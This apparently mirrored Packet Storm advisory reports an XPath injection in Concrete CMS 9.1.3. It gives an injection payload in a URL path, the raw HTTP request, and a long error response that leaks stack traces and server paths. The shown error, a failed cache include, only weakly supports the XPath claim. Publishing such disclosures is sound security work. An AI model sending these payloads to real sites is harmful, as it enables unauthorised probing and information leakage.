Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:170041
HistoryNov 29, 2022 - 12:00 a.m.

Concrete CMS 9.1.3 XPATH Injection

2022-11-2900:00:00
nu11secur1ty
packetstormsecurity.com
295
JSON
`## Title: concretecms-9.1.3 Xpath injection  
## Author: nu11secur1ty  
## Date: 11.28.2022  
## Vendor: https://www.concretecms.org/  
## Software: https://www.concretecms.org/download  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3  
  
## Description:  
The URL path folder `3` appears to be vulnerable to XPath injection attacks.  
The test payload 50539478' or 4591=4591-- was submitted in the URL  
path folder `3`, and an XPath error message was returned.  
The attacker can flood with requests the system by using this  
vulnerability to untilted he receives the actual paths of the all  
content of this system which content is stored on some internal or  
external server.  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploits:  
00:  
```GET  
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js  
HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107  
Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 0  
```  
  
[+] Response:  
  
```HTTP  
HTTP/1.1 500 Internal Server Error  
Date: Mon, 28 Nov 2022 15:32:22 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Connection: close  
Content-Type: text/html;charset=UTF-8  
Content-Length: 592153  
  
<!DOCTYPE html><!--  
  
  
Whoops\Exception\ErrorException: include(): Failed opening  
'C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php'  
for inclusion (include_path='C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR')  
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php  
on line 26  
Stack trace:  
1. Whoops\Exception\ErrorException->()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26  
3. Stash\Driver\FileSystem\NativeEncoder->deserialize()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201  
4. Stash\Driver\FileSystem->getData()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631  
5. Stash\Item->getRecord()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321  
6. Stash\Item->executeGet()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252  
7. Stash\Item->get()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346  
8. Stash\Item->isMiss()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67  
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356  
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601  
11. Laminas\I18n\Translator\Translator->loadMessages()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434  
12. Laminas\I18n\Translator\Translator->getTranslatedMessage()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349  
13. Laminas\I18n\Translator\Translator->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69  
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27  
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47  
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267  
17. Concrete\Core\Block\View\BlockView->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
18. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853  
19. Concrete\Core\Area\Area->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128  
20. Concrete\Core\Area\GlobalArea->display()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11  
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125  
22. Concrete\Core\View\View->inc()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4  
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329  
24. Concrete\Core\View\View->renderTemplate()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291  
25. Concrete\Core\View\View->renderViewContents()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164  
26. Concrete\Core\View\AbstractView->render()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19  
27. Concrete\Controller\SinglePage\PageNotFound->view()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
28. call_user_func_array()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318  
29. Concrete\Core\Controller\AbstractController->runAction()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188  
30. Concrete\Core\Http\ResponseFactory->controller()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95  
31. Concrete\Core\Http\ResponseFactory->notFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390  
32. Concrete\Core\Http\ResponseFactory->collectionNotFound()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234  
33. Concrete\Core\Http\ResponseFactory->collection()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132  
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60  
35. Concrete\Core\Http\DefaultDispatcher->dispatch()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39  
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39  
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36  
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36  
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35  
43. Concrete\Core\Http\Middleware\CookieMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29  
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50  
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86  
47. Concrete\Core\Http\Middleware\MiddlewareStack->process()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85  
48. Concrete\Core\Http\DefaultServer->handleRequest()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125  
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102  
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()  
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45  
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2  
  
  
--><html>  
<head>  
<meta charset="utf-8">  
<meta name="robots" content="noindex,nofollow"/>  
<meta name="viewport" content="width=device-width,  
initial-scale=1, shrink-to-fit=no"/>  
<title>Concrete CMS has encountered an issue.</title>  
  
<style>body {  
font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  
color: #131313;  
background: #eeeeee;  
padding:0;  
margin: 0;  
max-height: 100%;  
  
text-rendering: optimizeLegibility;  
}  
a {  
text-decoration: none;  
}  
  
.Whoops.container {  
position: relative;  
z-index: 9999999999;  
}  
  
.panel {  
overflow-y: scroll;  
height: 100%;  
position: fixed;  
margin: 0;  
left: 0;  
top: 0;  
}  
  
.branding {  
position: absolute;  
top: 10px;  
right: 20px;  
color: #777777;  
font-size: 10px;  
z-index: 100;  
}  
.branding a {  
color: #e95353;  
}  
  
header {  
color: white;  
box-sizing: border-box;  
background-color: #2a2a2a;  
padding: 35px 40px;  
max-height: 180px;  
overflow: hidden;  
transition: 0.5s;  
}  
  
header.header-expand {  
max-height: 1000px;  
}  
  
.exc-title {  
margin: 0;  
color: #bebebe;  
font-size: 14px;  
}  
.exc-title-primary, .exc-title-secondary {  
color: #e95353;  
}  
  
.exc-message {  
font-size: 20px;  
word-wrap: break-word;  
margin: 4px 0 0 0;  
color: white;  
}  
.exc-message span {  
display: block;  
}  
.exc-message-empty-notice {  
color: #a29d9d;  
font-weight: 300;  
}  
  
.......  
  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)  
  
## Proof and Exploit:  
[href](https://streamable.com/4f60ka)  
  
## Time spent  
`03:00:00`  
  
  
`
JSON